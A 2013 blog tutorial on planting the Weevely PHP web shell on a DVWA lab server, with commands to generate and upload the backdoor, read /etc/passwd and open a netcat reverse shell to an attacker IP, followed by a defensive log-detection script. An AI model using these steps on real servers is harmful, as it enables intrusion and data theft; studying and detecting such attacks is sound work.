Wednesday, April 17, 2013

Creating a Web Backdoor Using BackTrack (Weevely Tutorial)

Weevely is a stealth PHP web shell and backdoor that provides a telnet-like console to execute system commands and automate administration and post-exploitation tasks. It is an essential tool for web application post-exploitation, and it can also be used as a stealth backdoor.

Weevely is available by default in distributions such as BackTrack and BackBox.

Weevely has more than 30 modules available for post-exploitation tasks.

Weevely is written in Python.

Let's start the practical

Requirements:

1. A web server to upload the backdoor to (I installed DVWA on a Linux box)

2. The Weevely PHP shell (available in BackTrack 5 R3)

Steps to start

1. Weevely is available in /pentest/backdoors/web/weevely/

Open a terminal and type cd /pentest/backdoors/web/weevely/

2. Generate the PHP stealth backdoor

./weevely.py generate security


When we execute this command, a new file called weevely.php is created.

3. After generating the file, the next step is to upload weevely.php to the web server.

I am using DVWA (Damn Vulnerable Web Application) for testing purposes.



4. The file has now been uploaded successfully.

5. Now access weevely.php from the terminal

./weevely.py

./weevely.py http://192.168.142.135/dvwa/hackable/uploads/weevely.php security



Now we are on the server.

6. If we want to see the files in that directory, type ls



7. If we want to see passwords, type cat /etc/passwd


8. If we want to see who we are, type

whoami


9. Using Weevely as a backdoor

Here I open one more terminal and start netcat:

nc -lvp 1234

and in the Weevely terminal:

:backdoor.reverse_tcp 192.168.142.132 1234



Now we are connected.

Now you can access all server files.
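
On the defending side, steps 3 to 5 leave a clear trace in the web server's access log: successful requests for a .php file inside an upload directory. The following added example (not part of the original post or of Weevely) flags such requests in combined-format log lines; the log lines are constructed samples, and the function name and the "upload" directory-name pattern are assumptions.

```python
import re
from collections import defaultdict

# Apache/Nginx "combined" log format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
# Assumption: upload directories carry "upload" in a path segment (as DVWA's
# hackable/uploads/ does) and should only ever serve static files.
UPLOAD_DIR_RE = re.compile(r'/[^/?]*upload[^/?]*/', re.IGNORECASE)
SCRIPT_EXT_RE = re.compile(r'\.(php\d?|phtml|phar)$', re.IGNORECASE)

def find_upload_script_hits(lines):
    """Return {path: sorted client list} for successful (2xx) requests to
    server-side scripts located under an upload directory."""
    hits = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        path = m.group("path").split("?", 1)[0]  # ignore the query string
        if (UPLOAD_DIR_RE.search(path) and SCRIPT_EXT_RE.search(path)
                and m.group("status").startswith("2")):
            hits[path].add(m.group("client"))
    return {p: sorted(c) for p, c in hits.items()}

# Constructed sample log lines (not captured from a real server).
SAMPLE_LOG = [
    '192.168.142.132 - - [17/Apr/2013:10:01:02 +0000] "POST /dvwa/vulnerabilities/upload/ HTTP/1.1" 200 4521 "-" "Mozilla/5.0"',
    '192.168.142.132 - - [17/Apr/2013:10:01:30 +0000] "GET /dvwa/hackable/uploads/photo.jpg HTTP/1.1" 200 8812 "-" "Mozilla/5.0"',
    '192.168.142.132 - - [17/Apr/2013:10:02:10 +0000] "GET /dvwa/hackable/uploads/weevely.php HTTP/1.1" 200 0 "-" "-"',
    '192.168.142.132 - - [17/Apr/2013:10:02:15 +0000] "GET /dvwa/hackable/uploads/weevely.php?x=1 HTTP/1.1" 200 0 "-" "-"',
    '192.168.142.132 - - [17/Apr/2013:10:03:00 +0000] "GET /dvwa/login.php HTTP/1.1" 200 1523 "-" "Mozilla/5.0"',
    '192.168.142.132 - - [17/Apr/2013:10:03:40 +0000] "GET /dvwa/hackable/uploads/missing.php HTTP/1.1" 404 290 "-" "-"',
]

if __name__ == "__main__":
    for path, clients in find_upload_script_hits(SAMPLE_LOG).items():
        print(f"script executed from upload dir: {path} (clients: {', '.join(clients)})")
```

The matching hardening is to configure the web server so that files under the upload directory are never passed to the PHP interpreter.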

Thank you.
